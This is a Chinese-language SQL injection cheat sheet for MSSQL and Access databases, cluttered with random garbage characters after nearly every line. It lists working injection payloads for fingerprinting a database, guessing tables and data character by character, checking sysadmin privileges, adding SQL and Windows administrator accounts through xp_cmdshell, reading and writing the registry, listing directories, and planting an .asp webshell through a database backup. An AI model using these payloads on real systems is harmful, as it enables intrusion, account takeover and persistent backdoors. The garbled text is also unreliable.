1.判断是否有注入;and 1=1 ;and 1=2 n-OL0�$X�u
2.初步判断是否是mssql ;and user>0 �as_PoCoss
5 u0H�I��
3.注入参数是字符'and [查询条件] and ''=' �!Rt�>�xD
;(��{W�#Wa
4.搜索时没过滤参数的'and [查询条件] and '%25'=' tRf�o$4#NY
1!gbTeVl�Y
5.判断数据库系统 S�Z$Kz�� n
*W�T�`o�>�
;and (select count(*) from sysobjects)>0 mssql >dG�[G��>�
N�.{�D$"��
;and (select count(*) from msysobjects)>0 access 6MkP |�vr6
w+{LA���S
�\'bzt"f$j
��O�0y_Lm\
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ve�h<��R]U
�0K2`-�mL�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 C�2Tyo�za�
IN G�@B#Cl
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 >e"#'�K0?\
n.G!43�@*N
9.(1)猜字段的ascii值(access) DD�H:)=;�z
��VM,�]�X.
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 !GGkdg*-*9
�U`m54f@U
(2)猜字段的ascii值(mssql) �{Dmjm{�
�
�C73�k�Ja
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 :4%k9BGAj"
7Rt9od<
)!
10.测试权限结构(mssql) �>�o�e]$�r
^�a1^\�X.~
^��o�vR7+V
H�'hpEw��G
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- zI��<<Q2�
8pgEix/M5o
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- y;H-m>*%��
i�W /�}#�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ox (%5c)b|
&IB�|rw'9
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �{,~3.5u �
<3hRyG@�vB
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �igR"�;OQk
%�-�0t?�/>
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- )%@J=&G8TT
/�RC7"QzL�
;and 1=(select IS_MEMBER('db_owner'));-- >&�5Ds�V.B
�]wG{!0�pl
�N�Pe%�F+X
4��Wm�@W E
11.添加mssql和系统的帐户 Tyf`j,=���
Eg3q��!J&Z
;exec master.dbo.sp_addlogin username;-- C-[eaH�J'$
;exec master.dbo.sp_password null,username,password;-- '�u�b@]ru|
$'hEz��/�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- :A'y+MnK�<
=zK�M=qb�a
;exec master.dbo.xp_cmdshell 'net user username password =��$��Nq��
����e;}�7G
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- q�(2'\ _`u
nK�%LRc�As
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �R�[���x_j
[ ~&/s:Vvo
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ah+iZ}E�%�
5S--�'=fu+
�
�O+Y��6N
xx%�j.zDI]
12.(1)遍历目录 c|@b�wat4
_8�_R� �1s
;create table dirs(paths varchar(100), id int) p��sM�vq@>
*6DB0�X_-}
;insert dirs exec master.dbo.xp_dirtree 'c:\' g~A`N�=r;h
-:�y,N
9^�
;and (select top 1 paths from dirs)>0 "mvt���>�X
.��+A+�|yR
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �1�F�&Trqq
[}0h�aTYc4
Vt�&2z)Z�z
\��Et�3|Iv
(2)遍历目录 �=mp;�.k95
z��syI�V!(
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- #Kex�vP�&*
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 (\Ylt�C@q%
6.nCV��0xA
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 F��SW_<%��
Ks`J([(W�&
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ]>nk"�K!%
PKg@[�<g43
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 EVC]sU�T��
R3��&�Iu=g
54�R#W:t�
Dj���QFi��
13.mssql中的存储过程 '�=8d?�aeF
����MXNFlP
xp_regenumvalues 注册表根键, 子键 xH"/�1g���
��"8jf81V*
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 7�/@�T�F/V
ieC��E�o|b
xp_regread 根键,子键,键值名 qL�3;}�R�
0�Y{��yKL�
;exec xp_regread
q�wg�Pk9l
�]�tRu2Ygf
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 dufu|BL�|}
A�ta�:^q�I
xp_regwrite 根键,子键, 值名, 值类型, 值 UJ7*j%XQz_
%�o�a-WmWm
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 *�Y�7��u'v
W_(j3pV?Ml
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��k],Q9���
�!1��H�# 6
xp_regdeletevalue 根键,子键,值名 =�B�AW[%1b
0�e ~J�MUb
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Z!z�F\��<r
�3/e.38m�|
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �EPM�-df!=
J({Xg���?
RF�4vtQC=
9F�Y���Uo�
14.mssql的backup创建webshell t���Kx�~1-
gS]@I0y8
.
use model Mhf5bN|wQ�
&�n��}f?�
create table cmd(str image); qCpp6~]U�m
�}1i`6`y1�
insert into cmd(str) values (''); VfC�<WVYiZ
&ze�yE;/Hj
backup database model to disk='c:\l.asp'; ]��[h%U�rV
_w+�:Dv~*a
?u=F�j_�N_
j8{i#;s!"
15.mssql内置函数 q�qr?!vem6
f:��|1�_�j
;and (select @@version)>0 获得Windows的版本号 J1RJ�*mo7,
J76�kkW`5
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ��QIvVcfM^
4n g]\ituS
;and (select user_name())>0 爆当前系统的连接用户 JZ*/,|1}EC
���BmMGx8P
;and (select db_name())>0 得到当前连接的数据库 ���6�x�[}g
A�_
�N;
��
FvXZ�<�(A{
\�[_t]'��p
16.简洁的webshell a /l)qB�#
�{9;CNsd��
use model g:D>.lK�d�
-)]Yr �#�Q
create table cmd(str image); �~>Fu5i $i
�L �M�b�n
insert into cmd(str) values (''); vkd.)x`J�,
0g�y�/:�T�
backup database model to disk='g:\wwwtest\l.asp';
